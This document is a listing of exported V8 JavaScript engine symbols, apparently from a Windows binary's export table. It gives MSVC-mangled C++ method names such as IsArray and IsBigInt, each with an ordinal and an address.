                                  ?IsAllocateInOldGenerationStub@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z77300x140ec60b0
                                  ?IsAllocateInYoungGenerationStub@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z77310x140ec61b0
                                  ?IsAllocateRegularInOldGenerationStub@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z77320x140ec62b0
                                  ?IsAllocateRegularInYoungGenerationStub@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z77330x140ec63b0
                                  ?IsAllocated@InstructionOperand@compiler@internal@v8@@QEBA_NXZ77340x140453ce0
                                  ?IsAllocationMementoMap@MapRef@compiler@internal@v8@@QEBA_NXZ77350x140de55b0
                                  ?IsAllocationSite@ObjectRef@compiler@internal@v8@@QEBA_NXZ77360x140de55d0
                                  ?IsAllocationSiteMap@MapRef@compiler@internal@v8@@QEBA_NXZ77370x140de5620
                                  ?IsAllowed@?$PerThreadAssertScope@$00$00@internal@v8@@SA_NXZ77380x1409d7930
                                  ?IsAllowed@?$PerThreadAssertScope@$00$0A@@internal@v8@@SA_NXZ77390x1409d7930
                                  ?IsAllowed@?$PerThreadAssertScope@$01$00@internal@v8@@SA_NXZ77400x1409d7960
                                  ?IsAllowed@?$PerThreadAssertScope@$01$0A@@internal@v8@@SA_NXZ77410x1409d7960
                                  ?IsAllowed@?$PerThreadAssertScope@$02$00@internal@v8@@SA_NXZ77420x1409d7990
                                  ?IsAllowed@?$PerThreadAssertScope@$02$0A@@internal@v8@@SA_NXZ77430x1409d7990
                                  ?IsAllowed@?$PerThreadAssertScope@$0A@$00@internal@v8@@SA_NXZ77440x1409d79c0
                                  ?IsAllowed@?$PerThreadAssertScope@$0A@$0A@@internal@v8@@SA_NXZ77450x1409d79c0
                                  ?IsAnonymous@WasmCode@wasm@internal@v8@@QEBA_NXZ77460x140422390
                                  ?IsAny@Type@compiler@internal@v8@@AEBA_NXZ77470x14045c550
                                  ?IsAnyIdentifier@Token@internal@v8@@SA_NW4Value@123@@Z77480x140424400
                                  ?IsAnyInitialArrayPrototype@Isolate@internal@v8@@QEAA_NV?$Handle@VJSArray@internal@v8@@@23@@Z77490x140980080
                                  ?IsAnyLocationOperand@InstructionOperand@compiler@internal@v8@@QEBA_NXZ77500x140453cf0
                                  ?IsAnyRefOpcode@WasmOpcodes@wasm@internal@v8@@SA_NW4WasmOpcode@234@@Z77510x14051bd60
                                  ?IsAnyRegister@InstructionOperand@compiler@internal@v8@@QEBA_NXZ77520x140453d00
                                  ?IsAnyStackSlot@InstructionOperand@compiler@internal@v8@@QEBA_NXZ77530x140453d20
                                  ?IsApiWrapper@Object@v8@@QEAA_NXZ77540x140a93240
                                  ?IsArguments@Parser@internal@v8@@AEBA_NPEBVAstRawString@23@@Z77550x1406fb430
                                  ?IsArgumentsObject@Value@v8@@QEBA_NXZ77560x140a93260
                                  ?IsArray@Value@v8@@QEBA_NXZ77570x140a93280
                                  ?IsArrayBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA_NXZ77580x140de5640
                                  ?IsArrayBoilerplateDescriptionMap@MapRef@compiler@internal@v8@@QEBA_NXZ77590x140de5690
                                  ?IsArrayBuffer@Value@v8@@QEBA_NXZ77600x140a932a0
                                  ?IsArrayBufferDetachingIntact@Protectors@internal@v8@@SA_NPEAVIsolate@23@@Z77610x140622400
                                  ?IsArrayBufferView@Value@v8@@QEBA_NXZ77620x140a932d0
                                  ?IsArrayConstructorIntact@Protectors@internal@v8@@SA_NPEAVIsolate@23@@Z77630x140622430
                                  ?IsArrayIndex@Parser@internal@v8@@CA_NPEBVAstRawString@23@PEAI@Z77640x1406fb440
                                  ?IsArrayIteratorLookupChainIntact@Protectors@internal@v8@@SA_NPEAVIsolate@23@@Z77650x140622460
                                  ?IsArrayOrObjectOrStringPrototype@Isolate@internal@v8@@QEAA?AW4KnownPrototype@123@VObject@23@@Z77660x1409800c0
                                  ?IsArrayOrObjectPrototype@JSHeapBroker@compiler@internal@v8@@QEBA_NAEBVJSObjectRef@234@@Z77670x140de56b0
                                  ?IsArraySpeciesLookupChainIntact@Protectors@internal@v8@@SA_NPEAVIsolate@23@@Z77680x140622490
                                  ?IsArrowOrAssignmentOp@Token@internal@v8@@SA_NW4Value@123@@Z77690x140424410
                                  ?IsAsmModule@Scope@internal@v8@@QEBA_NXZ77700x140a55d40
                                  ?IsAsmWasmDataMap@MapRef@compiler@internal@v8@@QEBA_NXZ77710x140de57b0
                                  ?IsAssignableIdentifier@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEAVExpression@23@@Z77720x1406fb450
                                  ?IsAssignmentOp@Token@internal@v8@@SA_NW4Value@123@@Z77730x140424420
                                  ?IsAsync@Parser@internal@v8@@AEBA_NPEBVAstRawString@23@@Z77740x1406fb4b0
                                  ?IsAsyncFunction@Value@v8@@QEBA_NXZ77750x140a93300
                                  ?IsAsyncGeneratorRequestMap@MapRef@compiler@internal@v8@@QEBA_NXZ77760x140de57d0
                                  ?IsAtMaximumCapacity@NewSpace@internal@v8@@QEAA_NXZ77770x140424430
                                  ?IsAutoSemicolon@Token@internal@v8@@SA_NW4Value@123@@Z77780x140424450
                                  ?IsAwaitContextMap@MapRef@compiler@internal@v8@@QEBA_NXZ77790x140de57f0
                                  ?IsBackgroundThreadSpecificVariant@RuntimeCallStats@internal@v8@@QEAA_NW4RuntimeCallCounterId@23@@Z77800x140855850
                                  ?IsBasicBlockBegin@OperatorProperties@compiler@internal@v8@@SA_NPEBVOperator@234@@Z77810x140e43870
                                  ?IsBelowActivationThresholds@IncrementalMarking@internal@v8@@QEBA_NXZ77820x140921860
                                  ?IsBelowFrame@SaveContext@internal@v8@@QEAA_NPEAVStandardFrame@23@@Z77830x140980120
                                  ?IsBigInt64Array@Value@v8@@QEBA_NXZ77840x140a93330
                                  ?IsBigInt@ObjectRef@compiler@internal@v8@@QEBA_NXZ77850x140de5810
                                  ?IsBigInt@Value@v8@@QEBA_NXZ77860x140a93370
                                  ?IsBigIntBaseMap@MapRef@compiler@internal@v8@@QEBA_NXZ77870x140de5860
                                  ?IsBigIntMap@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z77880x140ec64b0
                                  ?IsBigIntMap@MapRef@compiler@internal@v8@@QEBA_NXZ77890x140de5860
                                  ?IsBigIntObject@Value@v8@@QEBA_NXZ77900x140a93390
                                  ?IsBigUint64Array@Value@v8@@QEBA_NXZ77910x140a933c0
                                  ?IsBinaryOp@Token@internal@v8@@SA_NW4Value@123@@Z77920x140424460
                                  ?IsBitOp@Token@internal@v8@@SA_NW4Value@123@@Z77930x140424470
                                  ?IsBitset@Type@compiler@internal@v8@@QEBA_NXZ77940x140424ab0
                                  ?IsBlackboxed@Debug@internal@v8@@QEAA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z77950x1409c23b0
                                  ?IsBlockContextMap@MapRef@compiler@internal@v8@@QEBA_NXZ77960x140de5880
                                  ?IsBoilerplateProperty@Parser@internal@v8@@CA_NPEAVObjectLiteralProperty@23@@Z77970x1406fb4d0
                                  ?IsBoolean@Value@v8@@QEBA_NXZ77980x140a93400
                                  ?IsBooleanMap@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z77990x140ec65b0
                                  ?IsBooleanObject@Value@v8@@QEBA_NXZ78000x140a93430
                                  ?IsBound@CodeAssemblerVariable@compiler@internal@v8@@QEBA_NXZ78010x140e704a0
                                  ?IsBreakAtReturn@Debug@internal@v8@@QEAA_NPEAVJavaScriptFrame@23@@Z78020x1409c2740
                                  ?IsBreakOnException@Debug@internal@v8@@QEAA_NW4ExceptionBreakType@23@@Z78030x1409c28b0
                                  ?IsBreakPointInfoMap@MapRef@compiler@internal@v8@@QEBA_NXZ78040x140de58a0
                                  ?IsBreakPointMap@MapRef@compiler@internal@v8@@QEBA_NXZ78050x140de58c0
                                  ?IsBreakable@WasmOpcodes@wasm@internal@v8@@SA_NW4WasmOpcode@234@@Z78060x14051bd80
                                  ?IsBuiltinOrApiFunction@JSCallReducer@compiler@internal@v8@@AEBA_NVJSFunctionRef@234@@Z78070x140f40ea0
                                  ?IsByteArrayMap@MapRef@compiler@internal@v8@@QEBA_NXZ78080x140de58e0
                                  ?IsBytecodeArray@ObjectRef@compiler@internal@v8@@QEBA_NXZ78090x140de5900
                                  ?IsBytecodeArrayMap@MapRef@compiler@internal@v8@@QEBA_NXZ78100x140de5960
                                  ?IsBytecodeWithScalableOperands@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z78110x14086f500
                                  ?IsCFunctionCall@CallDescriptor@compiler@internal@v8@@QEBA_NXZ78120x14045c560
                                  ?IsCacheable@ExternalStringResourceBase@String@v8@@UEBA_NXZ78130x140076ae0
                                  ?IsCacheableTransition@LookupIterator@internal@v8@@QEAA_NXZ78140x140424490
                                  ?IsCachedTemplateObjectMap@MapRef@compiler@internal@v8@@QEBA_NXZ78150x140de5980
                                  ?IsCall@Instruction@compiler@internal@v8@@QEBA_NXZ78160x140453570
                                  ?IsCallHandlerInfo@ObjectRef@compiler@internal@v8@@QEBA_NXZ78170x140de59a0
                                  ?IsCallHandlerInfoMap@MapRef@compiler@internal@v8@@QEBA_NXZ78180x140de59f0
                                  ?IsCallOrConstruct@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z78190x1404245d0
                                  ?IsCallRuntime@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z78200x1404245f0
                                  ?IsCallable@Object@v8@@QEAA_NXZ78210x140a93470
                                  ?IsCallable@Token@internal@v8@@SA_NW4Value@123@@Z78220x140424610
                                  ?IsCallableTaskMap@MapRef@compiler@internal@v8@@QEBA_NXZ78230x140de5a10
                                  ?IsCallbackTaskMap@MapRef@compiler@internal@v8@@QEBA_NXZ78240x140de5a30
                                  ?IsCandidate@Version@internal@v8@@SA_NXZ78250x14051a7d0
                                  ?IsCanonical@CharacterRange@internal@v8@@SA_NPEAV?$ZoneList@VCharacterRange@internal@v8@@@23@@Z78260x1406c0e90
                                  ?IsCatchContextMap@MapRef@compiler@internal@v8@@QEBA_NXZ78270x140de5a50
                                  ?IsCell@ObjectRef@compiler@internal@v8@@QEBA_NXZ78280x140de5a70
                                  ?IsCellMap@MapRef@compiler@internal@v8@@QEBA_NXZ78290x140de5ad0
                                  ?IsClamped@Bignum@internal@v8@@AEBA_NXZ78300x140848860
                                  ?IsClassPositionsMap@MapRef@compiler@internal@v8@@QEBA_NXZ78310x140de5af0
                                  ?IsClean@?$ConcurrentBitmap@$00@internal@v8@@QEAA_NXZ78320x1408ef030
                                  ?IsCleared@FeedbackNexus@internal@v8@@QEBA_NXZ78330x140424620
                                  ?IsClosureFeedbackCellArrayMap@MapRef@compiler@internal@v8@@QEBA_NXZ78340x140de5b10
                                  ?IsCode@ObjectRef@compiler@internal@v8@@QEBA_NXZ78350x140de5b30
                                  ?IsCodeDataContainerMap@MapRef@compiler@internal@v8@@QEBA_NXZ78360x140de5b90
                                  ?IsCodeGenerationFromStringsAllowed@Context@v8@@QEAA_NXZ78370x140a93480
                                  ?IsCodeMap@MapRef@compiler@internal@v8@@QEBA_NXZ78380x140de5bb0
                                  ?IsCommon@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@@Z78390x14045c570
                                  ?IsCommonOpcode@IrOpcode@compiler@internal@v8@@SA_NW4Value@1234@@Z78400x140453d40
                                  ?IsCompacting@IncrementalMarking@internal@v8@@QEAA_NXZ78410x14041b1a0
                                  ?IsCompareOp@Token@internal@v8@@SA_NW4Value@123@@Z78420x140424650
                                  ?IsCompareWithoutEffects@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z78430x140424660
                                  ?IsComparisonOpcode@IrOpcode@compiler@internal@v8@@SA_NW4Value@1234@@Z78440x140453d50
                                  ?IsComplete@IncrementalMarking@internal@v8@@QEBA_NXZ78450x14041b1c0
                                  ?IsConditionalJump@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z78460x140424670
                                  ?IsConditionalJumpConstant@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z78470x140424680
                                  ?IsConditionalJumpImmediate@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z78480x140424690
                                  ?IsConfigurable@LookupIterator@internal@v8@@QEBA_NXZ78490x1404246a0
                                  ?IsConsistentWithMap@LayoutDescriptor@internal@v8@@QEAA_NVMap@23@_N@Z78500x140076ae0
                                  ?IsConstFieldValueEqualTo@LookupIterator@internal@v8@@AEBA_NVObject@23@@Z78510x14079d660
                                  ?IsConstant@InstructionOperand@compiler@internal@v8@@QEBA_NXZ78520x140453d80
                                  ?IsConstant@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@@Z78530x14045c580
                                  ?IsConstantAtIndexSmi@BytecodeArrayAccessor@interpreter@internal@v8@@QEBA_NH@Z78540x14089b0b0
                                  ?IsConstantOpcode@IrOpcode@compiler@internal@v8@@SA_NW4Value@1234@@Z78550x140453d90
                                  ?IsConstructor@Object@v8@@QEAA_NXZ78560x140a934b0
                                  ?IsConstructor@Parser@internal@v8@@AEBA_NPEBVAstRawString@23@@Z78570x1406fb4e0
                                  ?IsConstructor@StackFrame@v8@@QEBA_NXZ78580x140a934d0
                                  ?IsContext@ObjectRef@compiler@internal@v8@@QEBA_NXZ78590x140de5cc0
                                  ?IsContextChainExtendingOpcode@IrOpcode@compiler@internal@v8@@SA_NW4Value@1234@@Z78600x140453da0
                                  ?IsContextEdge@NodeProperties@compiler@internal@v8@@SA_NVEdge@234@@Z78610x140e44ec0
                                  ?IsContextMap@MapRef@compiler@internal@v8@@QEBA_NXZ78620x140de5d30
                                  ?IsControl@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@@Z78630x14045c5a0
                                  ?IsControlEdge@NodeProperties@compiler@internal@v8@@SA_NVEdge@234@@Z78640x140e44f30
                                  ?IsControlOpcode@IrOpcode@compiler@internal@v8@@SA_NW4Value@1234@@Z78650x140453db0
                                  ?IsControlOpcode@WasmOpcodes@wasm@internal@v8@@SA_NW4WasmOpcode@234@@Z78660x14051bda0
                                  ?IsCountOp@Token@internal@v8@@SA_NW4Value@123@@Z78670x1404246b0
                                  ?IsCoupledControlEdge@Scheduler@compiler@internal@v8@@AEAA_NPEAVNode@234@H@Z78680x140fb8d00
                                  ?IsCoverageInfoMap@MapRef@compiler@internal@v8@@QEBA_NXZ78690x140de5d50
                                  ?IsCowArray@FixedArrayBase@internal@v8@@QEBA_NXZ78700x14077c1b0
                                  ?IsDataHandlerMap@MapRef@compiler@internal@v8@@QEBA_NXZ78710x140de5d70
                                  ?IsDataView@Value@v8@@QEBA_NXZ78720x140a934e0
                                  ?IsDate@Value@v8@@QEBA_NXZ78730x140a93500
                                  ?IsDead@Isolate@internal@v8@@QEAA_NXZ78740x1404246c0
                                  ?IsDead@Isolate@v8@@QEAA_NXZ78750x1404246c0
                                  ?IsDead@Node@compiler@internal@v8@@QEBA_NXZ78760x14045c5b0
                                  ?IsDebugBreak@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z78770x14086f540
                                  ?IsDebugEvaluateContextMap@MapRef@compiler@internal@v8@@QEBA_NXZ78780x140de5d90
                                  ?IsDebugInfoMap@MapRef@compiler@internal@v8@@QEBA_NXZ78790x140de5db0
                                  ?IsDecimalNumberKind@Scanner@internal@v8@@AEAA_NW4NumberKind@123@@Z78800x1404246d0
                                  ?IsDeferred@InstructionBlock@compiler@internal@v8@@QEBA_NXZ78810x140453dc0
                                  ?IsDeferredFixed@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ78820x140e83d40
                                  ?IsDefined@InstructionSelector@compiler@internal@v8@@QEBA_NPEAVNode@234@@Z78830x140e38140
                                  ?IsDeoptimizeCall@Instruction@compiler@internal@v8@@QEBA_NXZ78840x140453dd0
                                  ?IsDereferenceAllowed@HandleBase@internal@v8@@IEBA_NXZ78850x140076ae0
                                  ?IsDescriptorArray@ObjectRef@compiler@internal@v8@@QEBA_NXZ78860x140de5dd0
                                  ?IsDescriptorArrayMap@MapRef@compiler@internal@v8@@QEBA_NXZ78870x140de5e30
                                  ?IsDetachable@ArrayBuffer@v8@@QEBA_NXZ78880x140a93520
                                  ?IsDetached@Space@internal@v8@@QEBA_NXZ78890x1404246e0
                                  ?IsDouble@AsmJsScanner@internal@v8@@QEBA_NXZ78900x140a67520
                                  ?IsDoubleRegister@InstructionOperand@compiler@internal@v8@@QEBA_NXZ78910x140453e00
                                  ?IsDoubleStackSlot@InstructionOperand@compiler@internal@v8@@QEBA_NXZ78920x140453e30
                                  ?IsEffectEdge@NodeProperties@compiler@internal@v8@@SA_NVEdge@234@@Z78930x140e44fe0
                                  ?IsElement@LookupIterator@internal@v8@@QEBA_NVJSReceiver@23@@Z78940x1404246f0
                                  ?IsElement@LookupIterator@internal@v8@@QEBA_NXZ78950x140424720
                                  ?IsEliminated@MoveOperands@compiler@internal@v8@@QEBA_NXZ78960x140453e60
                                  ?IsEmbedded@Script@debug@v8@@QEBA_NXZ78970x140a93530
                                  ?IsEmbedderDataArrayMap@MapRef@compiler@internal@v8@@QEBA_NXZ78980x140de5f10
                                  ?IsEmbedderEmpty@MarkingWorklists@internal@v8@@QEAA_NXZ78990x1408efec0
                                  ?IsEmpty@BitVector@internal@v8@@QEBA_NXZ79000x140453e70
                                  ?IsEmpty@Coverage@debug@v8@@QEBA_NXZ79010x140424730
                                  ?IsEmpty@DisjointAllocationPool@wasm@internal@v8@@QEBA_NXZ79020x140424740
                                  ?IsEmpty@LargeObjectSpace@internal@v8@@QEAA_NXZ79030x140424750
                                  ?IsEmpty@LiveRange@compiler@internal@v8@@QEBA_NXZ79040x140429c70
                                  ?IsEmpty@Location@debug@v8@@QEBA_NXZ79050x140421c80
                                  ?IsEmpty@MarkingWorklists@internal@v8@@QEAA_NXZ79060x1408eff00
                                  ?IsEmptyString@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z79070x140ec66b0
                                  ?IsEnabled@AssemblerBase@internal@v8@@QEAA_NW4CpuFeature@23@@Z79080x140436220
                                  ?IsEnabled@CompilerDispatcher@internal@v8@@QEBA_NXZ79090x1409d6790
                                  ?IsEnabledScriptAndEval@CompilationCache@internal@v8@@AEBA_NXZ79100x1406a6490
                                  ?IsEnqueued@CompilerDispatcher@internal@v8@@QEBA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z79110x1409d67a0
                                  ?IsEnqueued@CompilerDispatcher@internal@v8@@QEBA_N_K@Z79120x1409d6830
                                  ?IsEnumCacheMap@MapRef@compiler@internal@v8@@QEBA_NXZ79130x140de5f30
                                  ?IsEnumerable@LookupIterator@internal@v8@@QEBA_NXZ79140x140424760
                                  ?IsEphemeronHashTableMap@MapRef@compiler@internal@v8@@QEBA_NXZ79150x140de5f50
                                  ?IsEqualityOp@Token@internal@v8@@SA_NW4Value@123@@Z79160x140424770
                                  ?IsEssentialHiddenReference@V8HeapExplorer@internal@v8@@AEAA_NVObject@23@H@Z79170x1406df0d0
                                  ?IsEssentialObject@V8HeapExplorer@internal@v8@@AEAA_NVObject@23@@Z79180x1406df130
                                  ?IsEval@Parser@internal@v8@@AEBA_NPEBVAstRawString@23@@Z79190x1406fb500
                                  ?IsEval@StackFrame@v8@@QEBA_NXZ79200x140a93550
                                  ?IsEvalContextMap@MapRef@compiler@internal@v8@@QEBA_NXZ79210x140de5f70
                                  ?IsEvalOrArguments@Parser@internal@v8@@AEBA_NPEBVAstRawString@23@@Z79220x1406fb520
                                  ?IsEverythingObserved@DecompressionOptimizer@compiler@internal@v8@@AEAA_NQEAVNode@234@@Z79230x140e83d50
                                  ?IsExactly@AsmType@wasm@internal@v8@@SA_NPEAV1234@0@Z79240x140a63540
                                  ?IsExceptionBlackboxed@Debug@internal@v8@@AEAA_N_N@Z79250x1409c28c0
                                  ?IsExceptionHandlerActive@CodeAssembler@compiler@internal@v8@@QEBA_NXZ79260x140e704b0
                                  ?IsExceptionalCall@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@PEAPEAV5234@@Z79270x140e45090
                                  ?IsExecutionTerminating@Isolate@v8@@QEAA_NXZ79280x140a93560
                                  ?IsExportedSubClassBaseMap@MapRef@compiler@internal@v8@@QEBA_NXZ79290x140de5f90
                                  ?IsExportedSubClassMap@MapRef@compiler@internal@v8@@QEBA_NXZ79300x140de5fb0
                                  ?IsExternal@ArrayBuffer@v8@@QEBA_NXZ79310x140a93580
                                  ?IsExternal@SharedArrayBuffer@v8@@QEBA_NXZ79320x140a93580
                                  ?IsExternal@String@v8@@QEBA_NXZ79330x140a93590
                                  ?IsExternal@Value@v8@@QEBA_NXZ79340x140a935b0
                                  ?IsExternalHandlerOnTop@Isolate@internal@v8@@QEAA_NVObject@23@@Z79350x140980190
                                  ?IsExternalOneByte@String@v8@@QEBA_NXZ79360x140a93600
                                  ?IsExternalStringMap@MapRef@compiler@internal@v8@@QEBA_NXZ79370x140de6060
                                  ?IsFP@InstructionSequence@compiler@internal@v8@@QEBA_NH@Z79380x140453eb0
                                  ?IsFPLocationOperand@InstructionOperand@compiler@internal@v8@@QEBA_NXZ79390x140453ed0
                                  ?IsFPRegister@InstructionOperand@compiler@internal@v8@@QEBA_NXZ79400x140453ef0
                                  ?IsFPStackSlot@InstructionOperand@compiler@internal@v8@@QEBA_NXZ79410x140453f20
                                  ?IsFalse@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z79420x140ec67b0
                                  ?IsFalse@Value@v8@@QEBA_NXZ79430x140a93620
                                  ?IsFastPointerLayout@LayoutDescriptor@internal@v8@@QEAA_NXZ79440x140424730
                                  ?IsFastPointerLayout@LayoutDescriptor@internal@v8@@SA_NVObject@23@@Z79450x140424780
                                  ?IsFeedbackCell@ObjectRef@compiler@internal@v8@@QEBA_NXZ79460x140de65f0
                                  ?IsFeedbackCellMap@MapRef@compiler@internal@v8@@QEBA_NXZ79470x140de6640
                                  ?IsFeedbackMetadataMap@MapRef@compiler@internal@v8@@QEBA_NXZ79480x140de6660
                                  ?IsFeedbackVector@ObjectRef@compiler@internal@v8@@QEBA_NXZ79490x140de6680
                                  ?IsFeedbackVectorMap@MapRef@compiler@internal@v8@@QEBA_NXZ79500x140de66e0
                                  ?IsFillerMap@MapRef@compiler@internal@v8@@QEBA_NXZ79510x140de6700
                                  ?IsFinished@Item@ItemParallelJob@internal@v8@@AEAA_NXZ79520x1408df2b0
                                  ?IsFixed@TopLevelLiveRange@compiler@internal@v8@@QEBA_NXZ79530x140e83d70
                                  ?IsFixedArray@ObjectRef@compiler@internal@v8@@QEBA_NXZ79540x140de6720
                                  ?IsFixedArrayBase@ObjectRef@compiler@internal@v8@@QEBA_NXZ79550x140de6780
                                  ?IsFixedArrayBaseMap@MapRef@compiler@internal@v8@@QEBA_NXZ79560x140de67e0
                                  ?IsFixedArrayExactMap@MapRef@compiler@internal@v8@@QEBA_NXZ79570x140de6800
                                  ?IsFixedArrayMap@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z79580x140ec68b0
                                  ?IsFixedArrayMap@MapRef@compiler@internal@v8@@QEBA_NXZ79590x140de6820
                                  ?IsFixedCowArrayMap@MapRef@compiler@internal@v8@@QEBA_NXZ79600x140de6840
                                  ?IsFixedDoubleArray@ObjectRef@compiler@internal@v8@@QEBA_NXZ79610x140de6880
                                  ?IsFixedDoubleArrayMap@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z79620x140ec69b0
                                  ?IsFixedDoubleArrayMap@MapRef@compiler@internal@v8@@QEBA_NXZ79630x140de68e0
                                  ?IsFloat32Array@Value@v8@@QEBA_NXZ79640x140a93650
                                  ?IsFloat64Array@Value@v8@@QEBA_NXZ79650x140a93690
                                  ?IsFloat64RoundDownSupported@CodeAssembler@compiler@internal@v8@@QEBA_NXZ79660x140e704d0
                                  ?IsFloat64RoundTiesEvenSupported@CodeAssembler@compiler@internal@v8@@QEBA_NXZ79670x140e704f0
                                  ?IsFloat64RoundTruncateSupported@CodeAssembler@compiler@internal@v8@@QEBA_NXZ79680x140e70510
                                  ?IsFloat64RoundUpSupported@CodeAssembler@compiler@internal@v8@@QEBA_NXZ79690x140e70530
                                  ?IsFloatRegister@InstructionOperand@compiler@internal@v8@@QEBA_NXZ79700x140453f50
                                  ?IsFloatStackSlot@InstructionOperand@compiler@internal@v8@@QEBA_NXZ79710x140453f80
                                  ?IsForeignMap@MapRef@compiler@internal@v8@@QEBA_NXZ79720x140de6900
                                  ?IsForwardJump@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z79730x140424790
                                  ?IsFound@LookupIterator@internal@v8@@QEBA_NXZ79740x1404247a0
                                  ?IsFrameBlackboxed@Debug@internal@v8@@AEAA_NPEAVJavaScriptFrame@23@@Z79750x1409c2950
                                  ?IsFrameStateEdge@NodeProperties@compiler@internal@v8@@SA_NVEdge@234@@Z79760x140e451b0
                                  ?IsFree@RegionAllocator@base@v8@@QEAA_N_K0@Z79770x140dcad50
                                  ?IsFreeSpaceMap@MapRef@compiler@internal@v8@@QEBA_NXZ79780x140de6920
                                  ?IsFromSpaceCommitted@NewSpace@internal@v8@@QEAA_NXZ79790x1404247b0
                                  ?IsFull@WeakArrayList@internal@v8@@QEAA_NXZ79800x14077c580
                                  ?IsFunction@Value@v8@@QEBA_NXZ79810x140a936d0
                                  ?IsFunctionContextMap@MapRef@compiler@internal@v8@@QEBA_NXZ79820x140de6940
                                  ?IsFunctionModeWithHomeObject@Factory@internal@v8@@SA_NW4FunctionMode@23@@Z79830x1404247c0
                                  ?IsFunctionModeWithName@Factory@internal@v8@@SA_NW4FunctionMode@23@@Z79840x1404247d0
                                  ?IsFunctionModeWithPrototype@Factory@internal@v8@@SA_NW4FunctionMode@23@@Z79850x1404247e0
                                  ?IsFunctionModeWithWritablePrototype@Factory@internal@v8@@SA_NW4FunctionMode@23@@Z79860x1404247f0
                                  ?IsFunctionTemplateInfo@ObjectRef@compiler@internal@v8@@QEBA_NXZ79870x140de6960
                                  ?IsFunctionTemplateInfoMap@MapRef@compiler@internal@v8@@QEBA_NXZ79880x140de69b0
                                  ?IsFunctionTemplateRareDataMap@MapRef@compiler@internal@v8@@QEBA_NXZ79890x140de69d0
                                  ?IsGeneratingEmbeddedBuiltins@Isolate@internal@v8@@QEBA_NXZ79900x140424800
                                  ?IsGeneratorFunction@Value@v8@@QEBA_NXZ79910x140a936f0
                                  ?IsGeneratorObject@Value@v8@@QEBA_NXZ79920x140a93720
                                  ?IsGeneric@FeedbackNexus@internal@v8@@QEBA_NXZ79930x140424810
                                  ?IsGlobal@AsmJsScanner@internal@v8@@QEBA_NXZ79940x140a67530
                                  ?IsGlobal@AsmJsScanner@internal@v8@@SA_NH@Z79950x140a67540
                                  ?IsGlobalDictionaryMap@MapRef@compiler@internal@v8@@QEBA_NXZ79960x140de69f0
                                  ?IsGraphTerminator@IrOpcode@compiler@internal@v8@@SA_NW4Value@1234@@Z79970x140453fb0
                                  ?IsHandler@InstructionBlock@compiler@internal@v8@@QEBA_NXZ79980x140453fd0
                                  ?IsHashTableMap@MapRef@compiler@internal@v8@@QEBA_NXZ79990x140de6a10
                                  ?IsHeapConstant@Type@compiler@internal@v8@@QEBA_NXZ80000x14045c5e0
                                  ?IsHeapLimitIncreasedForDebugging@Isolate@v8@@QEAA_NXZ80010x140077dd0
                                  ?IsHeapNumber@ObjectRef@compiler@internal@v8@@QEBA_NXZ80020x140de6a30
                                  ?IsHeapNumberMap@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z80030x140ec6ab0
                                  ?IsHeapNumberMap@MapRef@compiler@internal@v8@@QEBA_NXZ80040x140de6a80
                                  ?IsHeapObject@ObjectRef@compiler@internal@v8@@QEBA_NXZ80050x140de6aa0
                                  ?IsHighResolution@TimeTicks@base@v8@@SA_NXZ80060x140dc3480
                                  ?IsIdentifier@Parser@internal@v8@@CA_NPEAVExpression@23@@Z80070x1406fb540
                                  ?IsIdentifierPart@AsmJsScanner@internal@v8@@AEAA_NH@Z80080x140a67550
                                  ?IsIdentifierPartSlow@internal@v8@@YA_NH@Z80090x1405fea30
                                  ?IsIdentifierStart@AsmJsScanner@internal@v8@@AEAA_NH@Z80100x140a67580
                                  ?IsIdentifierStartSlow@internal@v8@@YA_NH@Z80110x1405fea80
                                  ?IsIfProjectionOpcode@IrOpcode@compiler@internal@v8@@SA_NW4Value@1234@@Z80120x140453fe0
                                  ?IsImmediate@InstructionOperand@compiler@internal@v8@@QEBA_NXZ80130x140453ff0
                                  ?IsImmutableProto@ObjectTemplate@v8@@QEAA_NXZ80140x14082edb0
                                  ?IsInAnyContext@Isolate@internal@v8@@QEAA_NVObject@23@I@Z80150x1409801d0
